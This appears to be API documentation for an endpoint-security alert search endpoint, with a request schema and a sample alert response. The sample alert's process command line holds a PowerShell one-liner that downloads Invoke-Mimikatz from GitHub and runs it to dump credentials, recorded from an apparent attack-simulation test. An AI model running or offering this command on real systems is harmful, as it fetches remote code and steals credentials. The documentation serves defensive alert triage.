Find alerts - Ungrouped

POST {{cb_url}}/api/alerts/v7/orgs/{{cb_org_key}}/alerts/_search

Alert search request. Multiple pathways support similar request body schemas.

See Documentation

RBAC Permissions Required

Permission (.notation name)Operation(s)
org.alertsREAD

Request Schema

{
  "query": "<string>",
  "time_range": {
    "start": "<dateTime>",
    "end": "<dateTime>",
    "range": "<string>"
  },
  "criteria": {
    "org_key": [
      "<string>"
    ],
    "id": [
      "<string>"
    ],
    "type": [
      "<string>"
    ],
    "backend_timestamp": {
      "start": "<dateTime>",
      "end": "<dateTime>",
      "range": "<string>"
    },
    "user_update_timestamp": {
      "start": "<dateTime>",
      "end": "<dateTime>",
      "range": "<string>"
    },
    "backend_update_timestamp": {
      "start": "<dateTime>",
      "end": "<dateTime>",
      "range": "<string>"
    },
    "detection_timestamp": {
      "start": "<dateTime>",
      "end": "<dateTime>",
      "range": "<string>"
    },
    "first_event_timestamp": {
      "start": "<dateTime>",
      "end": "<dateTime>",
      "range": "<string>"
    },
    "last_event_timestamp": {
      "start": "<dateTime>",
      "end": "<dateTime>",
      "range": "<string>"
    },
    "category": [
      "<string>"
    ],
    "minimum_severity": <integer>,
    "reason_code": [
      "<string>"
    ],
    "threat_id": [
      "<string>"
    ],
    "primary_event_id": [
      "<string>"
    ],
    "policy_applied": [
      "<string>"
    ],
    "run_state": [
      "<string>"
    ],
    "sensor_action": [
      "<string>"
    ],
    "workflow_status": [
      "<string>"
    ],
    "workflow_change_timestamp": {
      "start": "<dateTime>",
      "end": "<dateTime>",
      "range": "<string>"
    },
    "workflow_changed_by_type": [
      "<string>"
    ],
    "workflow_changed_by_autoclose_rule_id": [
      "<string>"
    ],
    "workflow_closure_reason": [
      "<string>"
    ],
    "determination_value": [
      "<string>"
    ],
    "determination_change_timestamp": {
      "start": "<dateTime>",
      "end": "<dateTime>",
      "range": "<string>"
    },
    "determination_changed_by_type": [
      "<string>"
    ],
    "tags": [
      "<string>"
    ],
    "alert_notes_present": <boolean>,
    "threat_notes_present": <boolean>,
    "device_id": [
      <long>
    ],
    "device_name": [
      "<string>"
    ],
    "device_uem_id": [
      "<string>"
    ],
    "device_policy": [
      "<string>"
    ],
    "device_policy_id": [
      <long>
    ],
    "device_target_value": [
      "<string>"
    ],
    "device_os": [
      "<string>"
    ],
    "device_os_version": [
      "<string>"
    ],
    "device_username": [
      "<string>"
    ],
    "device_location": [
      "<string>"
    ],
    "device_external_ip": [
      "<string>"
    ],
    "device_internal_ip": [
      "<string>"
    ],
    "rule_config_type": [
      "<string>"
    ],
    "rule_config_name": [
      "<string>"
    ],
    "rule_config_id": [
      "<string>"
    ],
    "rule_category_id": [
      "<string>"
    ],
    "rule_id": [
      "<string>"
    ],
    "process_guid": [
      "<string>"
    ],
    "process_pid": [
      <integer>
    ],
    "process_name": [
      "<string>"
    ],
    "process_sha256": [
      "<string>"
    ],
    "process_md5": [
      "<string>"
    ],
    "process_effective_reputation": [
      "<string>"
    ],
    "process_reputation": [
      "<string>"
    ],
    "process_cmdline": [
      "<string>"
    ],
    "process_username": [
      "<string>"
    ],
    "process_signatures_certificate_authority": [
      "<string>"
    ],
    "process_signatures_publisher": [
      "<string>"
    ],
    "parent_guid": [
      "<string>"
    ],
    "parent_pid": [
      <integer>
    ],
    "parent_name": [
      "<string>"
    ],
    "parent_sha256": [
      "<string>"
    ],
    "parent_md5": [
      "<string>"
    ],
    "parent_effective_reputation": [
      "<string>"
    ],
    "parent_reputation": [
      "ADWARE",
      "NOT_SUPPORTED"
    ],
    "parent_cmdline": [
      "<string>"
    ],
    "parent_username": [
      "<string>"
    ],
    "childproc_guid": [
      "<string>"
    ],
    "childproc_name": [
      "<string>"
    ],
    "childproc_sha256": [
      "<string>"
    ],
    "childproc_md5": [
      "<string>"
    ],
    "childproc_effective_reputation": [
      "<string>"
    ],
    "childproc_username": [
      "<string>"
    ],
    "childproc_cmdline": [
      "<string>"
    ],
    "netconn_remote_port": [
      <integer>
    ],
    "netconn_local_port": [
      <integer>
    ],
    "netconn_protocol": [
      "<string>"
    ],
    "netconn_remote_domain": [
      "<string>"
    ],
    "netconn_remote_ip": [
      "<string>"
    ],
    "netconn_local_ip": [
      "<string>"
    ],
    "netconn_remote_ipv4": [
      "<string>"
    ],
    "netconn_local_ipv4": [
      "<string>"
    ],
    "netconn_remote_ipv6": [
      "<string>"
    ],
    "netconn_local_ipv6": [
      "<string>"
    ],
    "threat_category": [
      "<string>"
    ],
    "ttps": [
      "<string>"
    ],
    "attack_tactic": [
      "<string>"
    ],
    "attack_technique": [
      "<string>"
    ],
    "report_id": [
      "<string>"
    ],
    "report_name": [
      "<string>"
    ],
    "report_link": [
      "<string>"
    ],
    "watchlists_id": [
      "<string>"
    ],
    "watchlists_name": [
      "<string>"
    ],
    "k8s_policy_id": [
      "<string>"
    ],
    "k8s_policy": [
      "<string>"
    ],
    "k8s_rule_id": [
      "<string>"
    ],
    "k8s_rule": [
      "<string>"
    ],
    "cluster_name": [
      "<string>"
    ],
    "namespace": [
      "<string>"
    ],
    "workload_kind": [
      "<string>"
    ],
    "workload_name": [
      "<string>"
    ],
    "replica_id": [
      "<string>"
    ],
    "connection_type": [
      "<string>"
    ],
    "egress_group_id": [
      "<string>"
    ],
    "egress_group_name": [
      "<string>"
    ],
    "ip_reputation": [
      <integer>
    ],
    "remote_is_private": <boolean>,
    "remote_namespace": [
      "<string>"
    ],
    "remote_replica_id": [
      "<string>"
    ],
    "remote_workload_kind": [
      "<string>"
    ],
    "remote_workload_name": [
      "<string>"
    ],
    "tms_rule_id": [
      "<string>"
    ],
    "threat_name": [
      "<string>"
    ],
    "vendor_name": [
      "<string>"
    ],
    "vendor_id": [
      "<string>"
    ],
    "product_name": [
      "<string>"
    ],
    "product_id": [
      "<string>"
    ],
    "external_device_friendly_name": [
      "<string>"
    ],
    "serial_number": [
      "<string>"
    ],
    "blocked_name": [
      "<string>"
    ],
    "blocked_sha256": [
      "<string>"
    ],
    "blocked_md5": [
      "<string>"
    ],
    "blocked_effective_reputation": [
      "<string>"
    ],
    "ml_classification_final_verdict": [
      "<string>"
    ],
    "ml_classification_global_prevalence": [
      "<string>"
    ],
    "ml_classification_org_prevalence": [
      "<string>"
    ],
    "mdr_alert": <boolean>,
    "mdr_workflow_status": [
      "<string>"
    ],
    "mdr_workflow_change_timestamp": {
      "start": "<dateTime>",
      "end": "<dateTime>",
      "range": "<string>"
    },
    "mdr_workflow_is_assigned": <boolean>,
    "mdr_determination_value": [
      "<string>"
    ],
    "mdr_determination_change_timestamp": {
      "start": "<dateTime>",
      "end": "<dateTime>",
      "range": "<string>"
    }
  },
  "exclusions": {
    "org_key": [
      "<string>"
    ],
    "id": [
      "<string>"
    ],
    "type": [
      "<string>"
    ],
    "backend_timestamp": {
      "start": "<dateTime>",
      "end": "<dateTime>",
      "range": "<string>"
    },
    "user_update_timestamp": {
      "start": "<dateTime>",
      "end": "<dateTime>",
      "range": "<string>"
    },
    "backend_update_timestamp": {
      "start": "<dateTime>",
      "end": "<dateTime>",
      "range": "<string>"
    },
    "detection_timestamp": {
      "start": "<dateTime>",
      "end": "<dateTime>",
      "range": "<string>"
    },
    "first_event_timestamp": {
      "start": "<dateTime>",
      "end": "<dateTime>",
      "range": "<string>"
    },
    "last_event_timestamp": {
      "start": "<dateTime>",
      "end": "<dateTime>",
      "range": "<string>"
    },
    "category": [
      "<string>"
    ],
    "minimum_severity": <integer>,
    "reason_code": [
      "<string>"
    ],
    "threat_id": [
      "<string>"
    ],
    "primary_event_id": [
      "<string>"
    ],
    "policy_applied": [
      "<string>"
    ],
    "run_state": [
      "<string>"
    ],
    "sensor_action": [
      "<string>"
    ],
    "workflow_status": [
      "<string>"
    ],
    "workflow_change_timestamp": {
      "start": "<dateTime>",
      "end": "<dateTime>",
      "range": "<string>"
    },
    "workflow_changed_by_type": [
      "<string>"
    ],
    "workflow_changed_by_autoclose_rule_id": [
      "<string>"
    ],
    "workflow_closure_reason": [
      "<string>"
    ],
    "determination_value": [
      "NONE"
    ],
    "determination_change_timestamp": {
      "start": "<dateTime>",
      "end": "<dateTime>",
      "range": "<string>"
    },
    "determination_changed_by_type": [
      "<string>"
    ],
    "tags": [
      "<string>"
    ],
    "alert_notes_present": <boolean>,
    "threat_notes_present": <boolean>,
    "device_id": [
      <long>
    ],
    "device_name": [
      "<string>"
    ],
    "device_uem_id": [
      "<string>"
    ],
    "device_policy": [
      "<string>"
    ],
    "device_policy_id": [
      <long>
    ],
    "device_target_value": [
      "<string>"
    ],
    "device_os": [
      "<string>"
    ],
    "device_os_version": [
      "<string>"
    ],
    "device_username": [
      "<string>"
    ],
    "device_location": [
      "<string>"
    ],
    "device_external_ip": [
      "<string>"
    ],
    "device_internal_ip": [
      "<string>"
    ],
    "rule_config_type": [
      "<string>"
    ],
    "rule_config_name": [
      "<string>"
    ],
    "rule_config_id": [
      "<string>"
    ],
    "rule_category_id": [
      "<string>"
    ],
    "rule_id": [
      "<string>"
    ],
    "process_guid": [
      "<string>"
    ],
    "process_pid": [
      <integer>
    ],
    "process_name": [
      "<string>"
    ],
    "process_sha256": [
      "<string>"
    ],
    "process_md5": [
      "<string>"
    ],
    "process_effective_reputation": [
      "<string>"
    ],
    "process_reputation": [
      "<string>"
    ],
    "process_cmdline": [
      "<string>"
    ],
    "process_username": [
      "<string>"
    ],
    "process_signatures_certificate_authority": [
      "<string>"
    ],
    "process_signatures_publisher": [
      "<string>"
    ],
    "parent_guid": [
      "<string>"
    ],
    "parent_pid": [
      <integer>
    ],
    "parent_name": [
      "<string>"
    ],
    "parent_sha256": [
      "<string>"
    ],
    "parent_md5": [
      "<string>"
    ],
    "parent_effective_reputation": [
      "<string>"
    ],
    "parent_reputation": [
      "<string>"
    ],
    "parent_cmdline": [
      "<string>"
    ],
    "parent_username": [
      "<string>"
    ],
    "childproc_guid": [
      "<string>"
    ],
    "childproc_name": [
      "<string>"
    ],
    "childproc_sha256": [
      "<string>"
    ],
    "childproc_md5": [
      "<string>"
    ],
    "childproc_effective_reputation": [
      "<string>"
    ],
    "childproc_username": [
      "<string>"
    ],
    "childproc_cmdline": [
      "<string>"
    ],
    "netconn_remote_port": [
      <integer>
    ],
    "netconn_local_port": [
      <integer>
    ],
    "netconn_protocol": [
      "<string>"
    ],
    "netconn_remote_domain": [
      "<string>"
    ],
    "netconn_remote_ip": [
      "<string>"
    ],
    "netconn_local_ip": [
      "<string>"
    ],
    "netconn_remote_ipv4": [
      "<string>"
    ],
    "netconn_local_ipv4": [
      "<string>"
    ],
    "netconn_remote_ipv6": [
      "<string>"
    ],
    "netconn_local_ipv6": [
      "<string>"
    ],
    "threat_category": [
      "<string>"
    ],
    "ttps": [
      "<string>"
    ],
    "attack_tactic": [
      "<string>"
    ],
    "attack_technique": [
      "<string>"
    ],
    "report_id": [
      "<string>"
    ],
    "report_name": [
      "<string>"
    ],
    "report_link": [
      "<string>"
    ],
    "watchlists_id": [
      "<string>"
    ],
    "watchlists_name": [
      "<string>"
    ],
    "k8s_policy_id": [
      "<string>"
    ],
    "k8s_policy": [
      "<string>"
    ],
    "k8s_rule_id": [
      "<string>"
    ],
    "k8s_rule": [
      "<string>"
    ],
    "cluster_name": [
      "<string>"
    ],
    "namespace": [
      "<string>"
    ],
    "workload_kind": [
      "<string>"
    ],
    "workload_name": [
      "<string>"
    ],
    "replica_id": [
      "<string>"
    ],
    "connection_type": [
      "<string>"
    ],
    "egress_group_id": [
      "<string>"
    ],
    "egress_group_name": [
      "<string>"
    ],
    "ip_reputation": [
      <integer>
    ],
    "remote_is_private": <boolean>,
    "remote_namespace": [
      "<string>"
    ],
    "remote_replica_id": [
      "<string>"
    ],
    "remote_workload_kind": [
      "<string>"
    ],
    "remote_workload_name": [
      "<string>"
    ],
    "tms_rule_id": [
      "<string>"
    ],
    "threat_name": [
      "<string>"
    ],
    "vendor_name": [
      "<string>"
    ],
    "vendor_id": [
      "<string>"
    ],
    "product_name": [
      "<string>"
    ],
    "product_id": [
      "<string>"
    ],
    "external_device_friendly_name": [
      "<string>"
    ],
    "serial_number": [
      "<string>"
    ],
    "blocked_name": [
      "<string>"
    ],
    "blocked_sha256": [
      "<string>"
    ],
    "blocked_md5": [
      "<string>"
    ],
    "blocked_effective_reputation": [
      "<string>"
    ],
    "ml_classification_final_verdict": [
      "<string>"
    ],
    "ml_classification_global_prevalence": [
      "<string>"
    ],
    "ml_classification_org_prevalence": [
      "<string>"
    ],
    "mdr_alert": <boolean>,
    "mdr_workflow_status": [
      "<string>"
    ],
    "mdr_workflow_change_timestamp": {
      "start": "<dateTime>",
      "end": "<dateTime>",
      "range": "<string>"
    },
    "mdr_workflow_is_assigned": <boolean>,
    "mdr_determination_value": [
      "<string>"
    ],
    "mdr_determination_change_timestamp": {
      "start": "<dateTime>",
      "end": "<dateTime>",
      "range": "<string>"
    }
  },
  "start": <long>,
  "rows": <long>,
  "sort": [
    {
      "field": "<string>",
      "order": "DESC"
    },
    {
      "field": "<string>",
      "order": "DESC"
    }
  ]
}


Request Body

{"time_range"=>{"range"=>"-2w"}, "criteria"=>{"minimum_severity"=>2, "device_os"=>["WINDOWS"]}, "exclusions"=>{"device_os_version"=>["Windows 10 x64"], "threat_id"=>["7103E507844087BE20351A50D8773029"]}, "start"=>"1", "rows"=>"10", "sort"=>[{"field"=>"severity", "order"=>"DESC"}]}

HEADERS

KeyDatatypeRequiredDescription
Content-Typestring
Acceptstring

RESPONSES

status: OK

{&quot;results&quot;:[{&quot;org_key&quot;:&quot;ABCD1234&quot;,&quot;alert_url&quot;:&quot;defense.conferdeploy.net/alerts?s[c][query_string]=id:1c3fa0b1-36fe-4641-9f87-95128bef94eb\u0026orgKey=ABCD1234&quot;,&quot;id&quot;:&quot;1c3fa0b1-36fe-4641-9f87-95128bef94eb&quot;,&quot;type&quot;:&quot;WATCHLIST&quot;,&quot;backend_timestamp&quot;:&quot;2023-08-06T13:33:47.411Z&quot;,&quot;user_update_timestamp&quot;:null,&quot;backend_update_timestamp&quot;:&quot;2023-08-06T13:33:47.411Z&quot;,&quot;detection_timestamp&quot;:&quot;2023-08-06T13:32:59.205Z&quot;,&quot;first_event_timestamp&quot;:&quot;2023-08-06T13:30:17.713Z&quot;,&quot;last_event_timestamp&quot;:&quot;2023-08-06T13:30:17.713Z&quot;,&quot;severity&quot;:10,&quot;reason&quot;:&quot;Process powershell.exe was detected by the report \&quot;Execution - AMSI - .Net Loading Suspicious Content Into Memory\&quot; in watchlist \&quot;AMSI Threat Intelligence\&quot;&quot;,&quot;reason_code&quot;:&quot;0f6918d8-98c5-3ed9-9786-b8c6094eeb78:8c25935c-f78b-3ed3-b29e-4ce9c2a42ba0&quot;,&quot;threat_id&quot;:&quot;0F6918D898C58ED9D786B8C6094EEB78&quot;,&quot;primary_event_id&quot;:&quot;DHeFhEvUQCerOi2CvDbWUA-0&quot;,&quot;policy_applied&quot;:&quot;NOT_APPLIED&quot;,&quot;run_state&quot;:&quot;RAN&quot;,&quot;sensor_action&quot;:&quot;ALLOW&quot;,&quot;workflow&quot;:{&quot;change_timestamp&quot;:&quot;2023-08-06T13:33:47.411Z&quot;,&quot;changed_by_type&quot;:&quot;SYSTEM&quot;,&quot;changed_by&quot;:&quot;ALERT_CREATION&quot;,&quot;closure_reason&quot;:&quot;NO_REASON&quot;,&quot;status&quot;:&quot;OPEN&quot;},&quot;determination&quot;:{&quot;change_timestamp&quot;:&quot;2023-08-06T13:33:47.411Z&quot;,&quot;value&quot;:&quot;NONE&quot;,&quot;changed_by_type&quot;:null,&quot;changed_by&quot;:null},&quot;tags&quot;:null,&quot;alert_notes_present&quot;:false,&quot;threat_notes_present&quot;:false,&quot;is_updated&quot;:false,&quot;device_id&quot;:1212123,&quot;device_name&quot;:&quot;demo_machine&quot;,&quot;device_uem_id&quot;:&quot;&quot;,&quot;device_target_value&quot;:&quot;MEDIUM&quot;,&quot;device_policy&quot;:&quot;default&quot;,&quot;device_policy_id&quot;:6525,&quot;device_os&quot;:&quot;WINDOWS&quot;,&quot;device_os_version&quot;:&quot;Windows Server 2019 x64&quot;,&quot;device_username&quot;:&quot;demo@demoorg.com&quot;,&quot;device_location&quot;:&quot;UNKNOWN&quot;,&quot;device_external_ip&quot;:&quot;1.2.3.4&quot;,&quot;device_internal_ip&quot;:&quot;5.6.7.8&quot;,&quot;mdr_alert&quot;:false,&quot;mdr_alert_notes_present&quot;:false,&quot;mdr_threat_notes_present&quot;:false,&quot;report_id&quot;:&quot;LrKOC7DtQbm4g8w0UFruQg-5f8518fb-3981-44ce-8ab7-b4a4240d50e0&quot;,&quot;report_name&quot;:&quot;Execution - AMSI - .Net Loading Suspicious Content Into Memory&quot;,&quot;report_description&quot;:&quot;An attacker can leverage PowerShell&#39;s built-in abilities to access the .Net subsystem in Windows to load arbitrary code into memory. This is a common technique that is used to evade on-host AV scanning by never writing a file to disk and executing payloads directly in memory. You should take immediate action if responding to this alert.&quot;,&quot;report_tags&quot;:[&quot;evasion&quot;,&quot;t1106&quot;,&quot;t1059&quot;,&quot;windows&quot;,&quot;amsi&quot;,&quot;attack&quot;,&quot;attackframework&quot;],&quot;report_link&quot;:&quot;https://attack.mitre.org/techniques/T1106/&quot;,&quot;ioc_id&quot;:&quot;5f8518fb-3981-44ce-8ab7-b4a4240d50e0&quot;,&quot;ioc_hit&quot;:&quot;fileless_scriptload_cmdline:\&quot;[System.Runtime.InteropServices.Marshal]::Copy\&quot; OR scriptload_content:\&quot;[System.Runtime.InteropServices.Marshal]::Copy\&quot;&quot;,&quot;watchlists&quot;:[{&quot;id&quot;:&quot;Ci7w5B4URg6HN60hatQMQ&quot;,&quot;name&quot;:&quot;AMSI Threat Intelligence&quot;}],&quot;process_guid&quot;:&quot;ABCD1234-006a07ff-00000540-00000000-1d9c86a2286f3bc&quot;,&quot;process_pid&quot;:1344,&quot;process_name&quot;:&quot;c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe&quot;,&quot;process_sha256&quot;:&quot;de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c&quot;,&quot;process_md5&quot;:&quot;7353f60b1739074eb17c5f4dddefe239&quot;,&quot;process_effective_reputation&quot;:&quot;TRUSTED_WHITE_LIST&quot;,&quot;process_reputation&quot;:&quot;TRUSTED_WHITE_LIST&quot;,&quot;process_cmdline&quot;:&quot;\&quot;powershell.exe\&quot; \u0026 {IEX (New-Object Net.WebClient).DownloadString(&#39;https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1&#39;); Invoke-Mimikatz -DumpCreds}&quot;,&quot;process_username&quot;:&quot;KOGNOS-W19-CB-3\\Administrator&quot;,&quot;process_issuer&quot;:[&quot;Microsoft Windows Production PCA 2011&quot;],&quot;process_publisher&quot;:[&quot;Microsoft Windows&quot;],&quot;parent_guid&quot;:&quot;ABCD1234-006a07ff-00000dbc-00000000-1d9c86a210c4ece&quot;,&quot;parent_pid&quot;:3516,&quot;parent_name&quot;:&quot;c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe&quot;,&quot;parent_sha256&quot;:&quot;de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c&quot;,&quot;parent_md5&quot;:&quot;7353f60b1739074eb17c5f4dddefe239&quot;,&quot;parent_effective_reputation&quot;:&quot;TRUSTED_WHITE_LIST&quot;,&quot;parent_reputation&quot;:&quot;TRUSTED_WHITE_LIST&quot;,&quot;parent_cmdline&quot;:&quot;\&quot;c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe\&quot; -c \&quot;cd c:\\ ; echo MYPID=$PID; Get-Date ; Invoke-AtomicTest T1003.001-10 \&quot;&quot;,&quot;parent_username&quot;:&quot;KOGNOS-W19-CB-3\\Administrator&quot;,&quot;childproc_guid&quot;:&quot;&quot;,&quot;childproc_username&quot;:&quot;&quot;,&quot;childproc_cmdline&quot;:&quot;&quot;,&quot;ml_classification_final_verdict&quot;:&quot;NOT_ANOMALOUS&quot;,&quot;ml_classification_global_prevalence&quot;:&quot;MEDIUM&quot;,&quot;ml_classification_org_prevalence&quot;:&quot;LOW&quot;}],&quot;num_found&quot;:10995,&quot;num_available&quot;:10000}